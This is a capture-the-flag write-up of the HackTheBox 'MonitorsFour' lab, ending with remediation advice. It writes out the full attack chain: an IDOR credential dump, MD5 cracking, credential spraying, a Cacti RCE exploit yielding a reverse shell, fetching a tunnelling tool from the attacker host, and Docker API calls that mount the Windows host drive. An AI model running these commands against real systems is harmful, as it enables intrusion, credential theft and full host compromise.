HackTheBox: MonitorsFour - Full Writeup

Box Information

Executive Summary

MonitorsFour is a Windows machine running a web application with an insecure API endpoint that leaks user credentials via an Insecure Direct Object Reference (IDOR) vulnerability. After cracking MD5 password hashes and performing credential spraying, we gain access to a Cacti network monitoring instance on a subdomain. Exploiting CVE-2025-24367 in Cacti 1.2.28 provides a reverse shell inside a Docker container. The container has network access to an exposed Docker API on the Windows host, which we exploit via CVE-2025-9074 to achieve full system compromise.

Reconnaissance

Initial Port Scan

nmap -sC -sV -oA nmap/monitorsfour 10.10.11.xxx

The scan reveals standard web services. Add the hostname to /etc/hosts:

echo "10.10.11.xxx monitorsfour.htb" | sudo tee -a /etc/hosts

Web Directory Enumeration

Using ffuf for directory brute-forcing with a medium-sized wordlist:

ffuf -t 400 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt \
     -u http://monitorsfour.htb/FUZZ -ac

Key Finding: /user endpoint discovered, returning JSON data.

Subdomain Enumeration

Virtual host enumeration to discover additional attack surface:

ffuf -t 400 -w /usr/share/seclists/Discovery/DNS/combined_subdomains.txt \
     -u http://monitorsfour.htb \
     -H "Host: FUZZ.monitorsfour.htb" -ac

Key Finding: cacti.monitorsfour.htb subdomain discovered.

Add to hosts file:

echo "10.10.11.xxx cacti.monitorsfour.htb" | sudo tee -a /etc/hosts

Vulnerability Assessment

API IDOR Vulnerability

The /user endpoint accepts a token parameter that appears to be a sequential user ID. Testing with token=0 returns all users in the database:

curl -s "http://monitorsfour.htb/user?token=0" | jq

Leaked Credentials:

Vulnerability Details:

• Type: Insecure Direct Object Reference (IDOR)
• Impact: Complete user database enumeration including password hashes
• Root Cause: No authorization check on the token parameter; value of 0 bypasses user-specific filtering

Exploitation

Phase 1: Password Cracking

The leaked hashes are unsalted MD5, making them trivial to crack with a wordlist attack:

# Create hash file
echo "56b32eb43e6f15395f6c46c1c9e1cd36" > hashes.txt

# Crack with hashcat (-m 0 = MD5)
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt

Cracked Password: wonderful1

Alternative using John the Ripper:

john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Phase 2: Credential Spraying & Web Application Access

With the password wonderful1 and usernames extracted from the API (including full names like "Marcus Watson"), we derive potential usernames and perform credential spraying.

Main Application Login:

Navigate to http://monitorsfour.htb/login and test credentials:

• Valid Credentials: marcus:wonderful1

The username marcus was derived from the full name "Marcus Watson" (mwatson) returned by the API.

After logging into the main application, we gain access to an admin panel. Navigating to http://monitorsfour.htb/admin/changelog reveals important information about the infrastructure, including Docker version details and recent updates. This information becomes critical later for the privilege escalation phase.

Cacti Subdomain Access:

Using the same credentials against http://cacti.monitorsfour.htb/cacti/:

• Valid Credentials: marcus:wonderful1 ✅

Phase 3: Cacti Version Identification

After logging in, the Cacti dashboard reveals version information:

• Version: Cacti 1.2.28
• CVE: CVE-2025-24367 - Authenticated Remote Code Execution

Vulnerability Background:

CVE-2025-24367 is an authenticated RCE vulnerability in Cacti versions prior to 1.2.29. The vulnerability exists in the graph template import functionality, allowing an authenticated user to inject arbitrary PHP code that gets executed on the server.

Phase 4: Cacti RCE Exploitation

Clone and execute the public exploit:

# Clone the exploit repository
git clone https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC
cd CVE-2025-24367-Cacti-PoC

# Set up listener in another terminal
nc -lvnp 4444

# Execute exploit
python3 exploit.py \
    -u marcus \
    -p wonderful1 \
    -i <YOUR_IP> \
    -l 4444 \
    --url http://cacti.monitorsfour.htb

Result: Reverse shell as www-data

Phase 5: Container Identification

Immediately upon landing, identify the environment:

# Check for Docker indicators
ls -la /.dockerenv
# File exists = we're in a container

# Additional confirmation
cat /proc/1/cgroup | grep docker
hostname
cat /etc/os-release

Conclusion: We're inside a Docker container, not the host system.

User Flag

The user flag is accessible from within the container:

cat /home/marcus/user.txt

Privilege Escalation: Docker Escape

Leveraging the Changelog Hint

Recall from earlier that http://monitorsfour.htb/admin/changelog revealed Docker version and configuration details. This information indicated that Docker Desktop was in use with potentially insecure API settings, pointing us toward investigating Docker API exposure as an escape vector.

Internal Network Reconnaissance

Enumerate the container's network to identify escape vectors:

# Check network interfaces
ip addr
cat /etc/hosts

# Scan for Docker API (common ports: 2375, 2376)
# Using bash if curl is available
for port in 2375 2376; do
    timeout 1 bash -c "echo >/dev/tcp/192.168.65.7/$port" 2>/dev/null && echo "Port $port open"
done

Discovery: Docker API exposed on 192.168.65.7:2375 (unencrypted)

Verify Docker API Access

curl -s http://192.168.65.7:2375/version | jq

Sample response confirming API access:

{
  "Version": "24.0.x",
  "ApiVersion": "1.43",
  "Os": "linux",
  "Arch": "amd64"
}

Method 1: Chisel Tunnel + Local Exploitation

For more reliable exploitation, tunnel the Docker API to your attacking machine.

On Attacking Machine:

# Start chisel server
./chisel server -p 8000 --reverse

# Also start a web server to transfer chisel
python3 -m http.server 8081

In Docker Container:

# Download chisel
curl http://<YOUR_IP>:8081/chisel -o /tmp/chisel
chmod +x /tmp/chisel

# Establish reverse tunnel
/tmp/chisel client <YOUR_IP>:8000 R:2375:192.168.65.7:2375

Now the Docker API is accessible on your local machine at localhost:2375.

Exploit CVE-2025-9074:

# Clone exploit
git clone https://github.com/j3r1ch0123/CVE-2025-9074
cd CVE-2025-9074

# Read root flag
python3 exploit.py \
    -u http://localhost:2375 \
    -c 'cat /host_root/Users/Administrator/Desktop/root.txt'

# Or get a shell
python3 exploit.py \
    -u http://localhost:2375 \
    -c 'powershell -e <BASE64_REVSHELL>'

Method 2: Direct Exploitation from Container

If you prefer to exploit directly without tunneling:

# Create malicious container with host filesystem mounted
CID=$(curl -s -X POST \
    -H "Content-Type: application/json" \
    http://192.168.65.7:2375/containers/create \
    -d '{
        "Image": "alpine",
        "Cmd": ["cat", "/host_root/Users/Administrator/Desktop/root.txt"],
        "HostConfig": {
            "Binds": ["/mnt/host/c:/host_root"]
        }
    }' | grep -o '"Id":"[^"]*' | cut -d'"' -f4)

echo "Container ID: $CID"

# Start the container
curl -s -X POST http://192.168.65.7:2375/containers/$CID/start

# Retrieve output (root flag)
curl -s "http://192.168.65.7:2375/containers/$CID/logs?stdout=true&stderr=true"

# Cleanup
curl -s -X DELETE http://192.168.65.7:2375/containers/$CID?force=true

Understanding the Mount Path:

In Docker Desktop for Windows, the host filesystem is accessible within containers via a special mount:

• /mnt/host/c maps to the Windows C:\ drive
• When we bind /mnt/host/c:/host_root, we're mounting C:\ to /host_root in our malicious container

Attack Chain Summary

┌─────────────────────────────────────────────────────────────────┐
│                    ATTACK CHAIN VISUALIZATION                    │
└─────────────────────────────────────────────────────────────────┘

[1] RECONNAISSANCE
    │
    ├── Directory Fuzzing ──► /user endpoint discovered
    │
    └── Subdomain Enum ──► cacti.monitorsfour.htb
    
[2] API EXPLOITATION (IDOR)
    │
    └── /user?token=0 ──► User database dump (MD5 hashes)
    
[3] CREDENTIAL ATTACK
    │
    ├── Hashcat (MD5) ──► wonderful1
    │
    └── Credential Spray ──► marcus:wonderful1
    
[4] WEB APPLICATION ACCESS
    │
    ├── /login ──► Main app access as marcus
    │
    ├── /admin/changelog ──► Docker version info (hint for escape)
    │
    └── Cacti login ──► marcus:wonderful1
    
[5] INITIAL ACCESS
    │
    └── CVE-2025-24367 ──► RCE as www-data (Docker container)
    
[6] DOCKER ESCAPE
    │
    ├── Changelog Hint ──► Docker Desktop configuration exposed
    │
    ├── Network Recon ──► Docker API @ 192.168.65.7:2375
    │
    └── CVE-2025-9074 ──► Privileged container with host mount
    
[7] SYSTEM COMPROMISE
    │
    └── /mnt/host/c mount ──► Full Windows filesystem access
                              └── Administrator/root.txt

Vulnerabilities Summary

Remediation Recommendations

1. API Security
   • Implement proper authorization checks on all API endpoints
   • Never expose sequential/guessable identifiers
   • Rate limit API requests
2. Password Security
   • Use bcrypt, scrypt, or Argon2 instead of MD5
   • Enforce strong password policies
   • Implement account lockout after failed attempts
3. Cacti Hardening
   • Update to Cacti 1.2.29 or later
   • Implement network segmentation
   • Regular security patching schedule
4. Docker Security
   • Never expose Docker API without TLS and authentication
   • Use Docker socket proxies with authorization
   • Implement network policies for container isolation
   • Regular container image scanning

Tools Used

References

• CVE-2025-24367 - Cacti RCE
• CVE-2025-9074 - Docker API Exploitation
• Docker API Documentation
• OWASP IDOR
• HackTheBox